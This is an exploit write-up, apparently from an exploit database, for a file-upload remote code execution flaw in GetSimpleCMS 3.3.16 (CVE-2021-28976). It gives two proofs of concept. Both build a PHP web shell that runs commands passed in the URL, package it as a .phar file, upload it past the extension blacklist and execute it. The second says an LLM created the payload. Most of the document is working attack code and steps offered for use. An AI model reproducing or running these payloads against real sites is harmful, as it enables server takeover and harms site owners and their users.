GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS
# Version: 3.3.16
# Tested on: Ubuntu Windows
# CVE : CVE-2021-28976

PoC-1:
1)Create a .phar file.
1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?>
2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows:
<?php
try {
    // Initialize a new Phar object, name it "archive.phar"
    $phar = new Phar('archive.phar');

    // Set the stub (entry point) for the Phar file, pointing to index.php
    $phar->startBuffering();
    $phar->addFromString('index.php', file_get_contents('index.php'));
    $phar->setStub($phar->createDefaultStub('index.php'));
    $phar->stopBuffering();

    echo "Phar archive created successfully!";
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}
3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. 
After running the script, you should find a file named archive.phar in your working directory.

2)Upload file:
1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 
2. You can find the file at http://getsimplecms/data/uploads/.

3)Details:
 "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.",
    "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.",
    "Request URL": "http://getsimplecms/admin/upload.php",
    "Request Method": "POST",
    "Request Parameters": {
        "file": "<Malicious File>"
    },


PoC-2:
1) LLM creates the file exploit.phar with the following contents:
malicious.php                                                                                       0000644 0000000 0000000 00000000036 00000000000 010442  0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php system($_GET['cmd']); ?>                  

2)
1. Prepare a PHP file named 'exploit.phar' .\n
2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n
3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id).

[Replace Your Domain Name]